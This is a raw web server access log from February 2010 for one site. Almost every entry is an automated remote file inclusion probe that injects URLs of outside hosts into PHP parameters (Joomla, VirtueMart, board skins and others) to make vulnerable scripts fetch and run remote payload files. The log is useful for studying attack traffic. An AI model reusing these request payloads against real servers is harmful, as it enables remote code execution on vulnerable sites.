24.207.120.69 - - [10/Feb/2010:06:09:50 -0800] "GET /logs/access_100111.log//?_PHPLIB[libdir]=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
24.207.120.69 - - [10/Feb/2010:06:09:51 -0800] "GET /?_PHPLIB[libdir]=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 200 3642 "-" "libwww-perl/5.831" "www.puaga.com"
24.207.120.69 - - [10/Feb/2010:06:09:52 -0800] "GET /logs//?_PHPLIB[libdir]=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 200 4947 "-" "libwww-perl/5.831" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:06:10:27 -0800] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [10/Feb/2010:06:10:32 -0800] "GET /logs//write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [10/Feb/2010:06:10:32 -0800] "GET /write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [10/Feb/2010:06:10:32 -0800] "GET /logs/access_100203.log%20%20//write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:06:10:37 -0800] "GET /logs/access_100127.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [10/Feb/2010:06:10:54 -0800] "GET /logs/access_100122.log%20%20//write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
92.1.71.0 - - [10/Feb/2010:06:11:43 -0800] "GET /?DOCUMENT_ROOT=http://www.freewebtown.com/curumeu/test.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.puaga.com"
92.1.71.0 - - [10/Feb/2010:06:11:44 -0800] "GET /logs/?DOCUMENT_ROOT=http://www.freewebtown.com/curumeu/test.txt??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.puaga.com"
24.23.78.174 - - [10/Feb/2010:06:12:07 -0800] "GET /logs/access_100130.log/index0.php?show=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.820" "www.puaga.com"
24.23.78.174 - - [10/Feb/2010:06:12:07 -0800] "GET /index0.php?show=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.820" "www.puaga.com"
24.23.78.174 - - [10/Feb/2010:06:12:08 -0800] "GET /logs/index0.php?show=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.820" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:06:12:48 -0800] "GET /logs/access_100127.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.98.23.9 - - [10/Feb/2010:06:13:06 -0800] "GET /logs/access_100123.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.98.23.9 - - [10/Feb/2010:06:13:06 -0800] "GET /logs/access_100118.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:06:14:44 -0800] "GET /logs/access_100121.log%20%20/index0.php?show=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:06:15:36 -0800] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:06:15:55 -0800] "GET /logs/access_100127.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [10/Feb/2010:06:16:20 -0800] "GET /accounts/inc/errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [10/Feb/2010:06:16:20 -0800] "GET /logs/access_100110.log//accounts/inc/errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [10/Feb/2010:06:16:20 -0800] "GET /logs//accounts/inc/errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [10/Feb/2010:06:16:45 -0800] "GET /accounts/inc/errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [10/Feb/2010:06:16:45 -0800] "GET /logs//accounts/inc/errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [10/Feb/2010:06:16:45 -0800] "GET /logs/access_100110.log//accounts/inc/errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
24.23.78.174 - - [10/Feb/2010:06:17:04 -0800] "GET /logs/access_100121.log/index0.php?show=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.820" "www.puaga.com"
24.23.78.174 - - [10/Feb/2010:06:17:09 -0800] "GET /logs/access_100121.log/index0.php?show=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.820" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:06:17:48 -0800] "GET /logs/access_100109.log////skin/ggambo7002_board/comment_modify.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.100.177 - - [10/Feb/2010:06:18:35 -0800] "GET /logs/access_100114.log/errors.php?error=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.100.177 - - [10/Feb/2010:06:19:01 -0800] "GET /logs/access_100119.log/errors.php?error=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [10/Feb/2010:06:19:25 -0800] "GET /logs/access_100110.log%20%20//accounts/inc/errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [10/Feb/2010:06:19:31 -0800] "GET /logs/access_100110.log%20%20//accounts/inc/errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:06:20:01 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:06:20:01 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:06:20:01 -0800] "GET /logs/access_100109.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
24.207.120.69 - - [10/Feb/2010:06:20:13 -0800] "GET /logs/access_100116.log//?_PHPLIB[libdir]=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
216.17.100.177 - - [10/Feb/2010:06:21:49 -0800] "GET /logs/access_100114.log/errors.php?error=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:06:22:08 -0800] "GET /logs/access_100109.log////skin/ggambo7002_board/comment_modify.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.100.177 - - [10/Feb/2010:06:22:09 -0800] "GET /logs/access_100119.log/errors.php?error=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:06:22:24 -0800] "GET /logs/access_100130.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:06:22:36 -0800] "GET /logs/access_100130.log////skin/ggambo7002_board/comment_modify.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [10/Feb/2010:06:23:22 -0800] "GET /logs/access_100107.log%20%20//accounts/inc/errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [10/Feb/2010:06:23:35 -0800] "GET /logs/access_100107.log%20%20//accounts/inc/errors.php?error=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
24.23.78.174 - - [10/Feb/2010:06:24:41 -0800] "GET /logs/access_100111.log//?_PHPLIB[libdir]=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.820" "www.puaga.com"
24.23.78.174 - - [10/Feb/2010:06:24:42 -0800] "GET /?_PHPLIB[libdir]=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 200 3642 "-" "libwww-perl/5.820" "www.puaga.com"
24.23.78.174 - - [10/Feb/2010:06:24:42 -0800] "GET /logs//?_PHPLIB[libdir]=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 200 4947 "-" "libwww-perl/5.820" "www.puaga.com"
82.76.12.197 - - [10/Feb/2010:06:25:55 -0800] "GET /errors.php?error=http://www.freewebtown.com/curumeu/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
82.76.12.197 - - [10/Feb/2010:06:25:55 -0800] "GET /logs/errors.php?error=http://www.freewebtown.com/curumeu/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
74.50.6.170 - - [10/Feb/2010:06:26:58 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.gonapus.net//zero/data/add/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
74.50.6.170 - - [10/Feb/2010:06:26:59 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.gonapus.net//zero/data/add/test.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
198.171.171.177 - - [10/Feb/2010:06:27:04 -0800] "GET /logs/access_100103.log//appserv/main.php?appserv_root=http://www.seolbong.es.kr/bbs/.../com_sef/id?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
198.171.171.177 - - [10/Feb/2010:06:27:05 -0800] "GET /appserv/main.php?appserv_root=http://www.seolbong.es.kr/bbs/.../com_sef/id?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
198.171.171.177 - - [10/Feb/2010:06:27:05 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.seolbong.es.kr/bbs/.../com_sef/id?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
198.171.171.177 - - [10/Feb/2010:06:27:15 -0800] "GET /logs/access_100126.log//appserv/main.php?appserv_root=http://www.seolbong.es.kr/bbs/.../com_sef/id?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
220.232.237.122 - - [10/Feb/2010:06:29:29 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [10/Feb/2010:06:29:29 -0800] "GET /logs/access_100119.log//index.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [10/Feb/2010:06:29:29 -0800] "GET /logs/access_100111.log//index.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [10/Feb/2010:06:29:29 -0800] "GET /index.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
174.129.52.110 - - [10/Feb/2010:06:29:36 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.129.52.110 - - [10/Feb/2010:06:29:36 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.129.52.110 - - [10/Feb/2010:06:29:36 -0800] "GET /logs/access_100201.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.129.52.110 - - [10/Feb/2010:06:30:31 -0800] "GET /logs/access_100107.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.129.52.110 - - [10/Feb/2010:06:31:31 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.129.52.110 - - [10/Feb/2010:06:31:31 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.129.52.110 - - [10/Feb/2010:06:31:31 -0800] "GET /logs/access_100201.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.129.52.110 - - [10/Feb/2010:06:32:01 -0800] "GET /logs/access_100107.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.73.56.64 - - [10/Feb/2010:06:32:09 -0800] "GET /logs/access_100126.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://files.sign.io/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.213.93.197 - - [10/Feb/2010:06:32:27 -0800] "GET /logs/access.log%20%20//write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.213.93.197 - - [10/Feb/2010:06:32:27 -0800] "GET /write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.213.93.197 - - [10/Feb/2010:06:32:27 -0800] "GET /logs//write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.129.52.110 - - [10/Feb/2010:06:32:47 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.129.52.110 - - [10/Feb/2010:06:32:47 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.129.52.110 - - [10/Feb/2010:06:32:47 -0800] "GET /logs/access_100201.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.73.56.64 - - [10/Feb/2010:06:33:07 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://files.sign.io/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.73.56.64 - - [10/Feb/2010:06:33:07 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://files.sign.io/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.73.56.64 - - [10/Feb/2010:06:33:07 -0800] "GET /logs/access_100126.log//bbs//skin/ggambo7002_board/write.php?dir=http://files.sign.io/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.129.52.110 - - [10/Feb/2010:06:33:18 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.129.52.110 - - [10/Feb/2010:06:33:18 -0800] "GET /logs/access_100201.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.129.52.110 - - [10/Feb/2010:06:33:18 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.129.52.110 - - [10/Feb/2010:06:33:21 -0800] "GET /logs/access_100107.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
76.73.56.64 - - [10/Feb/2010:06:33:23 -0800] "GET /logs/access_100109.log//bbs//skin/ggambo7002_board/write.php?dir=http://files.sign.io/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [10/Feb/2010:06:33:37 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [10/Feb/2010:06:33:37 -0800] "GET /logs/access_100119.log//index.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [10/Feb/2010:06:33:37 -0800] "GET /logs/access_100111.log//index.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [10/Feb/2010:06:33:38 -0800] "GET /index.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
174.129.52.110 - - [10/Feb/2010:06:33:41 -0800] "GET /logs/access_100107.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [10/Feb/2010:06:33:44 -0800] "GET /ideal/?M=D HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
24.23.78.174 - - [10/Feb/2010:06:34:30 -0800] "GET /logs/access_100116.log//?_PHPLIB[libdir]=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.820" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:06:36:22 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:06:36:23 -0800] "GET /logs/access_100109.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:06:36:25 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.213.93.197 - - [10/Feb/2010:06:37:18 -0800] "GET /write_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.213.93.197 - - [10/Feb/2010:06:37:19 -0800] "GET /logs//write_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.213.93.197 - - [10/Feb/2010:06:37:19 -0800] "GET /logs/access_100203.log%20%20//write_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.213.93.197 - - [10/Feb/2010:06:37:57 -0800] "GET /logs/access.log%20%20//write_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.100.177 - - [10/Feb/2010:06:37:58 -0800] "GET /phphtml.php?htmlclass_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.100.177 - - [10/Feb/2010:06:37:58 -0800] "GET /logs/access_100109.log%20%20/phphtml.php?htmlclass_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.100.177 - - [10/Feb/2010:06:37:58 -0800] "GET /logs/phphtml.php?htmlclass_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:06:38:22 -0800] "GET /logs/access_100130.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.100.177 - - [10/Feb/2010:06:38:27 -0800] "GET /logs/access_100108.log%20%20/phphtml.php?htmlclass_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.76.12.197 - - [10/Feb/2010:06:38:35 -0800] "GET /logs/?DOCUMENT_ROOT=http://www.freewebtown.com/curumeu/test.txt??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
82.76.12.197 - - [10/Feb/2010:06:38:36 -0800] "GET /?DOCUMENT_ROOT=http://www.freewebtown.com/curumeu/test.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
125.160.17.201 - - [10/Feb/2010:06:38:47 -0800] "GET /resource_categories_view.php?CLASSES_ROOT=http://www.kslr.or.kr/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.160.17.201 - - [10/Feb/2010:06:38:47 -0800] "GET /logs//resource_categories_view.php?CLASSES_ROOT=http://www.kslr.or.kr/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.160.17.201 - - [10/Feb/2010:06:38:47 -0800] "GET /logs/access_100112.log%20%20//resource_categories_view.php?CLASSES_ROOT=http://www.kslr.or.kr/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.100.177 - - [10/Feb/2010:06:38:57 -0800] "GET /logs/phphtml.php?htmlclass_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.100.177 - - [10/Feb/2010:06:38:57 -0800] "GET /phphtml.php?htmlclass_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.100.177 - - [10/Feb/2010:06:38:57 -0800] "GET /logs/access_100109.log%20%20/phphtml.php?htmlclass_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.100.177 - - [10/Feb/2010:06:39:24 -0800] "GET /logs/access_100108.log%20%20/phphtml.php?htmlclass_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.160.17.201 - - [10/Feb/2010:06:39:34 -0800] "GET /logs//resource_categories_view.php?CLASSES_ROOT=http://www.kslr.or.kr/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.160.17.201 - - [10/Feb/2010:06:39:34 -0800] "GET /resource_categories_view.php?CLASSES_ROOT=http://www.kslr.or.kr/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.160.17.201 - - [10/Feb/2010:06:39:34 -0800] "GET /logs/access_100112.log%20%20//resource_categories_view.php?CLASSES_ROOT=http://www.kslr.or.kr/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.160.17.201 - - [10/Feb/2010:06:39:38 -0800] "GET /logs/access_100103.log%20%20//resource_categories_view.php?CLASSES_ROOT=http://www.kslr.or.kr/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.160.17.201 - - [10/Feb/2010:06:39:40 -0800] "GET /logs/access_100103.log%20%20//resource_categories_view.php?CLASSES_ROOT=http://www.kslr.or.kr/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.163.145.165 - - [10/Feb/2010:06:41:32 -0800] "GET /logs/access_100108.log/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.blmra.co.uk/trust/modules/protector/configs/glup.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
173.165.1.69 - - [10/Feb/2010:06:41:32 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [10/Feb/2010:06:41:32 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [10/Feb/2010:06:41:32 -0800] "GET /logs/access_100123.log%20%20//newspublish/include.php?path%5Bdocroot%5D=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
